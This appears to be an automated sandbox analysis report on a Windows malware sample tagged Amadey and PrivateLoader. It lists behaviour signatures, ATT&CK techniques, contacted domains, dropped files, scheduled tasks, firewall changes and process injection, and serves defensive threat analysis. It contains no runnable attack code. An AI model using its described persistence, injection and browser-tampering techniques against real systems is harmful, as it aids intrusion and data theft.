Malware Analysis Report

2024-09-11 11:14

Sample ID 240618-w5f7zatgkd
Target 47069f002e03da24cb2ef04c19cce8f9.exe
SHA256 0581ff6cecc21644f9b5d85823362fe60f0c4b757664b7bfafcc9e2e158690d3
Tags
amadey privateloader 9a3efc discovery evasion execution loader spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0581ff6cecc21644f9b5d85823362fe60f0c4b757664b7bfafcc9e2e158690d3

Threat Level: Known bad

The file 47069f002e03da24cb2ef04c19cce8f9.exe was found to be: Known bad.

Malicious Activity Summary

amadey privateloader 9a3efc discovery evasion execution loader spyware stealer trojan

Modifies firewall policy service

PrivateLoader

Amadey

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Checks computer location settings

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of web browsers

Drops startup file

Loads dropped DLL

Checks installed software on the system

Drops Chrome extension

Looks up external IP address via web service

Drops desktop.ini file(s)

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Defense Evasion
TA0005
Modify Registry
T1112
Impair Defenses
T1562
Disable or Modify System Firewall
T1562.004
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-18 18:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-18 18:30

Reported

2024-06-18 18:32

Platform

win7-20240508-en

Max time kernel

120s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2236 set thread context of 1716 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2236 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2236 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2236 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2236 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2236 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2236 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2236 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2236 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2236 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Processes

C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe

"C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 iplogger.com udp

Files

memory/1716-0-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1716-2-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1716-4-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1716-5-0x000000007425E000-0x000000007425F000-memory.dmp

memory/1716-6-0x0000000074250000-0x000000007493E000-memory.dmp

memory/1716-7-0x000000007425E000-0x000000007425F000-memory.dmp

memory/1716-8-0x0000000074250000-0x000000007493E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-18 18:30

Reported

2024-06-18 18:32

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe"

Signatures

Amadey

trojan amadey

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe N/A

PrivateLoader

loader privateloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VGOz57y2yg06lL5huy1huMFw.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jAtUSPvq97LYvft0HGLoFFgm.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nD2U9VUyWRYvmxJ33Kwz97VC.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QPalvQM9nmlp2z9ipQi1jFax.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe N/A
N/A N/A C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe N/A
N/A N/A C:\Users\Admin\Pictures\JN0WyMsswwbbFizvqZKXA14d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS3B4.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
N/A N/A C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_9FBE97E00625C0963C1CF751F29CF9B3 C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_4780F988327458A7DCEC4A36CEB1E168 C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_65F72881313B5F8FFC737C28E760643D C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_65F72881313B5F8FFC737C28E760643D C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_9FBE97E00625C0963C1CF751F29CF9B3 C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_4780F988327458A7DCEC4A36CEB1E168 C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4704 set thread context of 2916 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Program Files (x86)\EhcFZyxgIKdU2\YSesdbb.xml C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Program Files (x86)\WjjwBKPUbwUn\ntETMWu.dll C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Program Files (x86)\YFvDcakXU\uEHhdRF.xml C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
File created C:\Program Files (x86)\zkyeWAejRmGXC\JUHAuMx.dll C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
File created C:\Program Files (x86)\EhcFZyxgIKdU2\YgfiGYo.xml C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Program Files (x86)\uBqHJZyJRZafGAkLOrR\ZQHYmOj.dll C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Program Files (x86)\YFvDcakXU\JVNkkE.dll C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
File created C:\Program Files (x86)\uBqHJZyJRZafGAkLOrR\SIHuyzV.dll C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
File created C:\Program Files (x86)\YFvDcakXU\xkVzZHx.xml C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Program Files (x86)\EhcFZyxgIKdU2\gOHvhHomjhATx.dll C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Program Files (x86)\uBqHJZyJRZafGAkLOrR\TUmeTrq.xml C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Program Files (x86)\EhcFZyxgIKdU2\LJBVoNckokkEd.dll C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
File created C:\Program Files (x86)\WjjwBKPUbwUn\ZWAWEQr.dll C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Program Files (x86)\zkyeWAejRmGXC\YHKmCEg.xml C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Program Files (x86)\zkyeWAejRmGXC\hAGVAhg.xml C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
File created C:\Program Files (x86)\YFvDcakXU\OvHmhT.dll C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File created C:\Program Files (x86)\zkyeWAejRmGXC\XZyaOza.dll C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
File created C:\Program Files (x86)\uBqHJZyJRZafGAkLOrR\XDRsbIj.xml C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\iDWmRIy.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\PhaZdSAoTEvbQMDnk.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\fbGnOvfweZKrsys.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\Tasks\PhaZdSAoTEvbQMDnk.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\skrppRkWbRTRJUWvY.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\fbGnOvfweZKrsys.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe N/A
File created C:\Windows\Tasks\bLaBYusGTeVzUnMcXL.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
